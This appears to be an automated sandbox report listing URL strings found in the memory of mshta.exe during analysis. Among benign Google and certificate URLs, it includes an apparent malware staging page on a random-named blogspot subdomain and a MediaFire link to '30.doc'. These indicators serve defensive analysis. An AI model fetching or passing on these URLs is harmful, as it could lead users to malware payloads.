Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.440300722.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441540511.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: mshta.exe, 00000010.00000003.483859380.0000000005642000.00000004.00000001.sdmp String found in binary or memory: http://csi.gstatic.com/csi
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494890776.0000000005AE8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484598287.0000000003392000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501500466.0000000005AE8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com%2C0
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/
Source: mshta.exe, 00000010.00000003.484598287.0000000003392000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/-
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/1%2
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/?tab=jj
Source: mshta.exe, 00000010.00000003.484598287.0000000003392000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/Q
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/age-verification.g?blogspotURL=https://kdaoskdokaodkwldld.blogspot.com/p/30.
Source: mshta.exe, 00000010.00000003.457364588.000000000565F000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26t
Source: mshta.exe, 00000010.00000002.500488420.00000000055A5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496794465.000000000026D000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fkdaoskdokaodkwldld.blogspot.com%2Fp%2F30.
Source: mshta.exe, 00000010.00000003.484440784.00000000055CF000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://kdaoskdokaodkwldld.blogspot.com/p/30.html&t
Source: mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=
Source: mshta.exe, 00000010.00000003.484440784.00000000055CF000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=3903609419317699398&zx=5f07c876-e
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000002.496743401.000000000023E000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=3903609419317699398&zx=5f07c876-ed15-
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488412884.0000000002ACF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488324679.0000000002ACB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.487928492.0000000002AC8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488398920.0000000002ACD000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488337884.0000000002ACC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488290964.0000000002AC9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483590836.0000000005AEB000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/3903609419317699398/posts/default
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicy
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapi
Source: mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforum
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/discuss
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenter
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacy
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/terms
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/tutorials
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484351334.0000000005626000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484481957.00000000033D7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
Source: mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsN7
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.483617923.0000000005AE5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.485261587.0000000002AA7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484816374.000000000026C000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496794465.000000000026D000.00000004.00000020.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.483590836.0000000005AEB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js
Source: mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js.css
Source: mshta.exe, 00000010.00000003.494471731.0000000002625000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.485665591.0000000002623000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsTb
Source: mshta.exe, 00000010.00000003.484481957.00000000033D7000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css&
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css0EgG.
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css1
Source: mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.csspng
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.485785054.000000000262A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.493952509.000000000262D000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.485665591.0000000002623000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494460143.0000000002630000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1397508952-widgets.js
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1397508952-widgets.js903609419317699398&zx=5f07c876-ed15-4
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1397508952-widgets.jsC0
Source: mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1397508952-widgets.jsjs/pv7
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1529571102-css_bundle_v2.css
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1529571102-css_bundle_v2.css7YD.
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1529571102-css_bundle_v2.csskYD.
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.comu$G.
Source: mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495236095.00000000055EB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484351334.0000000005626000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484481957.00000000033D7000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: mshta.exe, 00000010.00000003.495294389.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484623125.0000000005549000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500262076.000000000554A000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js30
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsm
Source: mshta.exe, 00000010.00000003.495294389.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484623125.0000000005549000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500262076.000000000554A000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/ml
Source: mshta.exe, 00000010.00000003.495294389.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484623125.0000000005549000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500262076.000000000554A000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/s
Source: mshta.exe, 00000010.00000002.501168449.00000000056BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/intl/de/about/products?tab=jh
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/save
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/shopping?hl=de&source=og&tab=jf
Source: mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495236095.00000000055EB000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/1#%HC1IiG.
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/57%2
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/?brand=CHZO&utm_source=google.com&utm_medium=desktop-app-launc
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501103190.00000000056AF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/css/maia.css
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501103190.00000000056AF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css57
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.cssY
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.cssily=Open
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/finance?tab=je
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/travel/?dest_src=al
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.google.de/contact/impressum.html
Source: mshta.exe, 00000010.00000003.484481957.00000000033D7000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png)
Source: mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.mJX-uhXwTA4.O/rt=j/m=q_dnp
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.shRVBKchaBo.L.X.O/m=qawd
Source: mshta.exe, 00000005.00000002.441579663.0000000003A07000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.440369877.0000000003A07000.00000004.00000001.sdmp String found in binary or memory: https://www.mediafire.com/
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.440284850.000000000399C000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441515938.000000000399C000.00000004.00000001.sdmp String found in binary or memory: https://www.mediafire.com/file/o7mbmqzedgahqhw/30.doc/file
